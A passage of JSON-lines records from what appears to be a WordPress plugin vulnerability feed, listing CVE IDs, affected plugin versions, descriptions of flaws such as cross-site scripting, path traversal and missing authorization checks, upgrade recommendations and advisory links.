version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/estatik-mortgage-calculator\\\/trunk\\\/public\\\/images\\\/info.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/estatik-mortgage-calculator\\\/trunk\\\/public\\\/images\\\/info.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199224%40estatik-mortgage-calculator&new=3199224%40estatik-mortgage-calculator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199224%40estatik-mortgage-calculator&new=3199224%40estatik-mortgage-calculator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b955a0f-d064-436f-8648-0e84fac752d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b955a0f-d064-436f-8648-0e84fac752d2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8663","slug":"wp-simple-booking-calendar","versionImpact":"2.0.10","versionEndExcluding":"2.0.11","description":"The WP Simple Booking Calendar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.10. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cad4300f-02f9-4c9f-9bb3-1c9da8b78ac9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cad4300f-02f9-4c9f-9bb3-1c9da8b78ac9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-booking-calendar\\\/tags\\\/2.0.10\\\/includes\\\/base\\\/admin\\\/calendar\\\/views\\\/view-edit-calendar.php#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-booking-calendar\\\/tags\\\/2.0.10\\\/includes\\\/base\\\/admin\\\/calendar\\\/views\\\/view-edit-calendar.php#L155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150474%40wp-simple-booking-calendar&new=3150474%40wp-simple-booking-calendar&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150474%40wp-simple-booking-calendar&new=3150474%40wp-simple-booking-calendar&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-booking-calendar\\\/tags\\\/2.0.10\\\/includes\\\/modules\\\/update-checker\\\/views\\\/view-register-website.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-booking-calendar\\\/tags\\\/2.0.10\\\/includes\\\/modules\\\/update-checker\\\/views\\\/view-register-website.php#L21\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6491","slug":"getwid","versionImpact":"2.0.10","versionEndExcluding":"2.0.11","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the mailchimp_api_key_manage function in all versions up to, and including, 2.0.10. This makes it possible for authenticated attackers, with Contributor-level access and above, to set the MailChimp API key.","recommendation":"Update to version 2.0.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb2be4cd-2641-4f7f-993c-1c78e5a1d5da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb2be4cd-2641-4f7f-993c-1c78e5a1d5da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/trunk\\\/includes\\\/blocks\\\/mailchimp.php#L190\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/trunk\\\/includes\\\/blocks\\\/mailchimp.php#L190\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119180\\\/getwid\\\/trunk\\\/includes\\\/blocks\\\/mailchimp.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119180\\\/getwid\\\/trunk\\\/includes\\\/blocks\\\/mailchimp.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6489","slug":"getwid","versionImpact":"2.0.10","versionEndExcluding":"2.0.11","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the get_google_api_key function in all versions up to, and including, 2.0.10. This makes it possible for authenticated attackers, with Contributor-level access and above, to set the Google API key.","recommendation":"Update to version 2.0.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe391ac9-e3ea-48b3-8ffe-243972ce89f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe391ac9-e3ea-48b3-8ffe-243972ce89f6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119180\\\/getwid\\\/trunk\\\/includes\\\/blocks\\\/google-map.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119180\\\/getwid\\\/trunk\\\/includes\\\/blocks\\\/google-map.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0236","slug":"tutor","versionEndExcluding":"2.0.10","description":"The Tutor LMS WordPress plugin before 2.0.10 does not sanitise and escape the reset_key and user_id parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/503835db-426d-4b49-85f7-c9a20d6ff5b8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/503835db-426d-4b49-85f7-c9a20d6ff5b8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11357","slug":"goodlayers-core","versionImpact":"2.0.9","versionEndExcluding":"2.0.10","description":"The goodlayers-core WordPress plugin before 2.0.10 does not sanitise and escape some of its settings, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e8c6816-9b7a-43e8-9508-789c8051dd9b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e8c6816-9b7a-43e8-9508-789c8051dd9b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10014","slug":"kau-boys-backend-localization","versionImpact":"2.0","versionEndExcluding":"2.0.1","description":"A vulnerability classified as problematic has been found in Kau-Boy Backend Localization Plugin 2.0 on WordPress. Affected is the function backend_localization_admin_settings\/backend_localization_save_setting\/backend_localization_login_form\/localize_backend of the file backend_localization.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 2.0.1 is able to address this issue. The name of the patch is 36f457ee16dd114e510fd91a3ea9fbb3c1f87184. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-227232.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/releases\\\/tag\\\/2.0.1\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/releases\\\/tag\\\/2.0.1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/commit\\\/36f457ee16dd114e510fd91a3ea9fbb3c1f87184\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/commit\\\/36f457ee16dd114e510fd91a3ea9fbb3c1f87184\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.227232\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.227232\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227232\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227232\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1090","slug":"smtp-mailing-queue","versionEndExcluding":"2.0.1","description":"The SMTP Mailing Queue WordPress plugin before 2.0.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d470dd6c-dcac-4a3e-b42a-2489a31aca45\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d470dd6c-dcac-4a3e-b42a-2489a31aca45\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/youki992\\\/youki992.github.io\\\/blob\\\/master\\\/others\\\/apply.md\",\"name\":\"https:\\\/\\\/github.com\\\/youki992\\\/youki992.github.io\\\/blob\\\/master\\\/others\\\/apply.md\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12814","slug":"loan-comparison","versionImpact":"2.0","versionEndExcluding":"2.0.1","description":"The Loan Comparison plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'loancomparison' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/loan-comparison\\\/tags\\\/2.0&new_path=\\\/loan-comparison\\\/tags\\\/2.0.1&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/loan-comparison\\\/tags\\\/2.0&new_path=\\\/loan-comparison\\\/tags\\\/2.0.1&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212274%40loan-comparison&new=3212274%40loan-comparison&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212274%40loan-comparison&new=3212274%40loan-comparison&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9d000ad-a8f1-44c8-8c11-4a1982e1e6e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9d000ad-a8f1-44c8-8c11-4a1982e1e6e4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13427","slug":"pagelayer","versionImpact":"2.0.0","versionEndExcluding":"2.0.1","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button widget in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially fixed in version 1.9.9 and completely fixed in version 2.0.1.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298138\\\/pagelayer\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298138\\\/pagelayer\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5df2f3cc-affc-4549-b59e-d145cce10c79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5df2f3cc-affc-4549-b59e-d145cce10c79?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4223","slug":"pagelayer","versionImpact":"2.0.0","versionEndExcluding":"2.0.1","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018login_url\u2019 parameter in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. A valid username\/password pair needs to be supplied in order to be successfully exploited and any injected scripts will only execute in the context of that authenticated user.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pagelayer\\\/tags\\\/2.0.0\\\/main\\\/ajax.php#L1415\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pagelayer\\\/tags\\\/2.0.0\\\/main\\\/ajax.php#L1415\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=3298138%40pagelayer%2Ftrunk%2Fmain%2Fajax.php&old=3253356%40pagelayer%2Ftrunk%2Fmain%2Fajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=3298138%40pagelayer%2Ftrunk%2Fmain%2Fajax.php&old=3253356%40pagelayer%2Ftrunk%2Fmain%2Fajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6db6736-4629-47b7-976a-f81335430119?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6db6736-4629-47b7-976a-f81335430119?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9935","slug":"pdf-generator-addon-for-elementor-page-builder","versionImpact":"2.0.0","versionEndExcluding":"2.0.1","description":"The PDF Generator Addon for Elementor Page Builder plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.5 via the rtw_pgaepb_dwnld_pdf() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36daf2af-1db3-4b35-8849-480212660b2f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36daf2af-1db3-4b35-8849-480212660b2f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-generator-addon-for-elementor-page-builder\\\/trunk\\\/public\\\/class-pdf-generator-addon-for-elementor-page-builder-public.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-generator-addon-for-elementor-page-builder\\\/trunk\\\/public\\\/class-pdf-generator-addon-for-elementor-page-builder-public.php#L133\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6832","slug":"aio-time-clock-lite","versionImpact":"2.0","versionEndExcluding":"2.0.1","description":"The All in One Time Clock Lite \u2013 Tracking Employee Time Has Never Been Easier plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'nonce' parameter in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336943%40aio-time-clock-lite&new=3336943%40aio-time-clock-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336943%40aio-time-clock-lite&new=3336943%40aio-time-clock-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/844b7471-3adf-45fd-9906-f0c817d6565c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/844b7471-3adf-45fd-9906-f0c817d6565c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11759","slug":"bukza","versionImpact":"2.0.0","versionEndExcluding":"2.0.1","description":"The Bukza plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bukza' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207300%40bukza&new=3207300%40bukza&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207300%40bukza&new=3207300%40bukza&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e348b24-4c49-43ed-b4f3-b31f0f709830?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e348b24-4c49-43ed-b4f3-b31f0f709830?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2605","slug":"wpbrutalai","versionEndExcluding":"2.0.1","description":"The wpbrutalai WordPress plugin before 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against logged-in high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/372cb940-71ba-4d19-b35a-ab15f8c2fdeb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/372cb940-71ba-4d19-b35a-ab15f8c2fdeb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0889","slug":"tf-numbers-number-counter-animaton","versionEndExcluding":"2.0.1","description":"Themeflection Numbers WordPress plugin before 2.0.1 does not have authorisation and CSRF checks in an AJAX action, and does not ensure that the options to be updated belong to the plugin. As a result, it could allow any authenticated user, such as a subscriber, to update arbitrary blog options, such as enabling registration and setting the default role to administrator","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c39473a7-47fc-4bce-99ad-28d03f41e74e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c39473a7-47fc-4bce-99ad-28d03f41e74e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8680","slug":"b-slider","versionImpact":"2.0.0","versionEndExcluding":"2.0.1","description":"The B Slider- Gutenberg Slider Block for WP plugin for WordPress is vulnerable to Server-Side Request Forgery in versions less than, or equal to, 2.0.0 via the fs_api_request function. This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-slider\\\/tags\\\/1.1.30\\\/bplugins_sdk\\\/inc\\\/Base\\\/FSActivate.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-slider\\\/tags\\\/1.1.30\\\/bplugins_sdk\\\/inc\\\/Base\\\/FSActivate.php#L166\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3343487%40b-slider&new=3343487%40b-slider&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3343487%40b-slider&new=3343487%40b-slider&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac245316-228e-4508-b3fe-f7071fb1bc8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac245316-228e-4508-b3fe-f7071fb1bc8e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8676","slug":"b-slider","versionImpact":"2.0.0","versionEndExcluding":"2.0.1","description":"The B Slider- Gutenberg Slider Block for WP plugin for WordPress is vulnerable to Sensitive Information Exposure in versions less than, or equal to, 2.0.0 via the get_active_plugins function. This makes it possible for authenticated attackers, with subscriber-level access and above to extract sensitive data including installed plugin information.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-slider\\\/tags\\\/1.1.30\\\/adminMenu.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-slider\\\/tags\\\/1.1.30\\\/adminMenu.php#L83\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3343487%40b-slider&new=3343487%40b-slider&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3343487%40b-slider&new=3343487%40b-slider&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c19b24ef-cf49-4a5c-a187-0f09ac53c337?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c19b24ef-cf49-4a5c-a187-0f09ac53c337?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2104","slug":"pagelayer","versionImpact":"1.9.8","versionEndExcluding":"2.0.0","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to unauthorized post publication due to insufficient validation on the pagelayer_save_content() function in all versions up to, and including, 1.9.8. This makes it possible for authenticated attackers, with Contributor-level access and above, to bypass post moderation and publish posts to the site.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253356%40pagelayer&new=3253356%40pagelayer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253356%40pagelayer&new=3253356%40pagelayer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e3897fb-0f40-4111-8a7d-60415e1f9f96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e3897fb-0f40-4111-8a7d-60415e1f9f96?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5331","slug":"breakdance","versionImpact":"1.7.2","versionEndExcluding":"2.0.0","description":"The Breakdance plugin for WordPress is vulnerable to unauthorized access of data in all versions up to, and including, 1.7.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to export form submissions.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbe8d453-21f0-43e2-84d3-3c520ab9c308?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbe8d453-21f0-43e2-84d3-3c520ab9c308?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/breakdance.com\\\/breakdance-2-0-now-available\\\/\",\"name\":\"https:\\\/\\\/breakdance.com\\\/breakdance-2-0-now-available\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5330","slug":"breakdance","versionImpact":"1.7.2","versionEndExcluding":"2.0.0","description":"The Breakdance plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the breakdance_css_file_paths_cache parameter in all versions up to, and including, 1.7.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dbd26f5-b75e-41a3-aefb-d6c8cc2cec7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dbd26f5-b75e-41a3-aefb-d6c8cc2cec7b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/breakdance.com\\\/breakdance-2-0-now-available\\\/\",\"name\":\"https:\\\/\\\/breakdance.com\\\/breakdance-2-0-now-available\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13546","slug":"generateblocks","versionImpact":"1.9.1","versionEndExcluding":"2.0.0","description":"The GenerateBlocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.1 via the 'get_image_description' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including the content of private, draft, and scheduled posts and pages.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-dynamic-content.php#L1047\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-dynamic-content.php#L1047\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-dynamic-content.php#L1054\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-dynamic-content.php#L1054\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239461\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239461\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f6f2a8c-ecd9-482c-a32e-0c3d7a7e4ec4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f6f2a8c-ecd9-482c-a32e-0c3d7a7e4ec4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13732","slug":"responsive-block-editor-addons","versionImpact":"1.9.9","versionEndExcluding":"2.0.0","description":"The Responsive Blocks \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018section_tag\u2019 parameter in all versions up to, and including, 1.9.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.0, or a newer patched 